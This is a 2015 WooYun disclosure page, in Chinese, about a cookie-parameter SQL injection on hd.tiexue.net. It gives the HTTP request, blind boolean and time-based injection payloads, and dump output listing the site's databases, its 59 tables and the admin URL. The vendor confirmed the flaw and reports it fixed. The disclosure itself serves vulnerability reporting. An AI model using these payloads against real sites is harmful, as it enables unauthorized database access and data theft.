当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0119209

漏洞标题:铁血科技某处Cookie参数SQL注射

相关厂商:北京铁血科技

漏洞作者: 路人甲

提交时间:2015-06-09 15:21

修复时间:2015-07-26 12:24

公开时间:2015-07-26 12:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-09: 细节已通知厂商并且等待厂商处理中
2015-06-11: 厂商已经确认,细节仅向厂商公开
2015-06-21: 细节向核心白帽子及相关领域专家公开
2015-07-01: 细节向普通白帽子公开
2015-07-11: 细节向实习白帽子公开
2015-07-26: 细节向公众公开

简要描述:

233

详细说明:

这是一个指哪修哪的洞,希望厂商这次能重视
GET / HTTP/1.1
Cookie: TTtuangou_tFrcLX_sid=1; TTtuangou_tFrcLX_loginref=http%3A%2F%2Fhd.tiexue.net%2F
X-Requested-With: XMLHttpRequest
Referer: http://hd.tiexue.net/
Host: hd.tiexue.net
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
还有这类页面:
/activity_1.html
/admin.php
/reserve_1.html
/view-136.html

漏洞证明:

---
Parameter: TTtuangou_tFrcLX_sid (Cookie)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: TTtuangou_tFrcLX_sid=1' RLIKE (SELECT (CASE WHEN (2866=2866) THEN 1 ELSE 0x28 END)) AND 'EZwI'='EZwI; TTtuangou_tFrcLX_loginref=http://hd.tiexue.net/
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: TTtuangou_tFrcLX_sid=1' AND (SELECT * FROM (SELECT(SLEEP(5)))xksz) AND 'gANi'='gANi; TTtuangou_tFrcLX_loginref=http://hd.tiexue.net/
---
web application technology: Nginx, PHP 5.4.7
back-end DBMS: MySQL 5.0.12
current user: 'hdu@localhost'
available databases [3]:
[*] information_schema
[*] test
[*] txhddata
Database: txhddata
[59 tables]
+--------------------------------------+
| cenwor_system_failedlogins |
| cenwor_system_log |
| cenwor_system_memberfields |
| cenwor_system_members |
| cenwor_system_onlinetime |
| cenwor_system_report |
| cenwor_system_robot |
| cenwor_system_robot_ip |
| cenwor_system_robot_log |
| cenwor_system_role |
| cenwor_system_role_action |
| cenwor_system_role_module |
| cenwor_system_sessions |
| cenwor_tttuangou_activity |
| cenwor_tttuangou_activity_user |
| cenwor_tttuangou_address |
| cenwor_tttuangou_api_apps |
| cenwor_tttuangou_api_protocol |
| cenwor_tttuangou_api_session |
| cenwor_tttuangou_article |
| cenwor_tttuangou_attrs |
| cenwor_tttuangou_attrs_cat |
| cenwor_tttuangou_attrs_order |
| cenwor_tttuangou_catalog |
| cenwor_tttuangou_city |
| cenwor_tttuangou_city_place |
| cenwor_tttuangou_comments |
| cenwor_tttuangou_express |
| cenwor_tttuangou_express_area |
| cenwor_tttuangou_express_cdp |
| cenwor_tttuangou_express_corp |
| cenwor_tttuangou_express_printer_log |
| cenwor_tttuangou_finder |
| cenwor_tttuangou_links |
| cenwor_tttuangou_metas |
| cenwor_tttuangou_order |
| cenwor_tttuangou_order_clog |
| cenwor_tttuangou_paylog |
| cenwor_tttuangou_payment |
| cenwor_tttuangou_prize_phone |
| cenwor_tttuangou_prize_ticket |
| cenwor_tttuangou_prize_ticket_win |
| cenwor_tttuangou_product |
| cenwor_tttuangou_push_log |
| cenwor_tttuangou_push_queue |
| cenwor_tttuangou_push_template |
| cenwor_tttuangou_question |
| cenwor_tttuangou_recharge_card |
| cenwor_tttuangou_recharge_order |
| cenwor_tttuangou_regions |
| cenwor_tttuangou_reports |
| cenwor_tttuangou_seller |
| cenwor_tttuangou_service |
| cenwor_tttuangou_subscribe |
| cenwor_tttuangou_ticket |
| cenwor_tttuangou_uploads |
| cenwor_tttuangou_usermoney |
| cenwor_tttuangou_usermsg |
| cenwor_tttuangou_zlog |
+--------------------------------------+
后台地址:http://hd.tiexue.net/admin.php

修复方案:

~~~~~~~~·

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-06-11 12:23

厂商回复:

非常感谢路人甲,我们及时修复

最新状态:

暂无